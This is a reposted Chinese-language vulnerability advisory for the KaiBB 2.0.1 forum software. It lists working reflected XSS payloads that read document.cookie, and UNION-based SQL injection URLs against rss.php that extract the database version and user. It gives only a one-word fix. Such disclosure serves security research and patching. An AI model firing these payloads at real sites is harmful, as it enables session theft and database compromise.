来源:自学PHP网 时间:2015-04-17 14:47 作者: 阅读:次
[导读] 标题: KaiBB 2.0.1 XSS and SQL Injection vulnerabilities作者: Stefan Schurtz影响软件:Successfully tested on KaiBB 2.0.1开发者:http://code.google.com/p/kaibb/缺陷分析:概述:KaiBB 2.0.1......
|
标题: KaiBB 2.0.1 XSS and SQL Injection vulnerabilities 作者: Stefan Schurtz 影响软件:Successfully tested on KaiBB 2.0.1 开发者:http://code.google.com/p/kaibb/ 缺陷分析: 概述: KaiBB 2.0.1 含XSS 和SQL Injection
技术分析 : Cross-site Scripting http://www.2cto.com /kaibb/?'</script><script>alert(document.cookie)</script> http://www.2cto.com /kaibb/index.php?'</script><script>alert(document.cookie)</script> SQL Injection http://www.2cto.com /kaibb/rss.php?forum=' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL AND 'a'='a http://www.2cto.com /kaibb/rss.php?forum=' UNION ALL SELECT NULL, version(), NULL, NULL, NULL, NULL, NULL AND 'a'='a http://www.2cto.com /kaibb/rss.php?forum=' UNION ALL SELECT NULL, user(), NULL, NULL, NULL, NULL, NULL AND 'a'='a 解决: 过滤 |
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com
